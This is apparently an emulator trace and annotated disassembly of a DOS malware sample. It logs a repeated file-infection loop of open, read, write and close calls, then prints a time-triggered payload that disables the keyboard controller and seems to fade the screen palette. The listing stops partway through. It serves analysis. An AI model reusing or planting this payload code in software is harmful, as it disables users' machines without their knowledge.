2018-12-25T12:27:06.622408437Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.626853276Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.628059646Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.629994259Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.631488972Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.637666299Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.644261606Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.646461941Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.651497537Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.656786256Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.65843676Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.660397791Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.661608069Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.667168811Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.679848352Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.682747509Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.689926692Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.694388299Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.695351867Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.697469591Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.699251856Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.701254698Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.708356801Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.711472691Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.71813177Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.725610789Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.727295978Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.730038819Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.73251616Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.741288082Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.751014923Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.765877866Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.771004664Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.778343311Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.780257263Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.78323215Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.785232701Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.788335531Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.796758228Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.799276989Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.805422729Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.811883373Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.8131977Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.815882645Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.817672687Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.82639615Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.834449191Z 79 PC: 12b41 | Find next file (See above)
; Time check that follows the Get time call, then the start of the code it guards.
; Annotations assume the standard INT 21h AH=2Ch return convention (CH = hour,
; CL = minute). The listing is a linear dump from the return address; it does
; not show which branch this run actually took. It is cut off after 0x12b7a.
2018-12-25T12:27:06.836865443Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd ; hour compared with 13 (0xd)
0x12b55: jl 0x12b9d ; hour < 13: skip the guarded code
0x12b57: cmp cl, 0xd ; minute compared with 13
0x12b5a: jne 0x12b9d ; minute != 13: skip; the guarded code runs only at hh:13 with hh >= 13
0x12b5c: cli ; interrupts off around the controller write
0x12b5d: mov al, 0xad ; 0xAD = "disable keyboard interface" command of the 8042 keyboard controller
0x12b5f: out 0x64, al ; port 0x64 = keyboard controller command port; keyboard input stops until re-enabled
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64 ; busy-wait of 0xff iterations, presumably to let the controller accept the command
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf ; CL = 0x0f, copied to BL below as the palette register number
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl
0x12b71: int 0x10 ; INT 10h AX=1007h: read one palette register (BL = register, value returned in BH)
0x12b73: cmp bh, 0
0x12b76: je 0x12b85 ; value already 0: branch away
0x12b78: mov ch, 1 ; CH = 1 when the value was non-zero; its later use is outside this excerpt
0x12b7a: sub bh, 1 ; value - 1; looks like one step of a palette fade -- confirm against the full listing
2018-12-25T12:27:06.969051123Z 78 PC: 12bce | Find first file
2018-12-25T12:27:06.974715527Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:06.976974145Z 43 PC: 12aae | Set date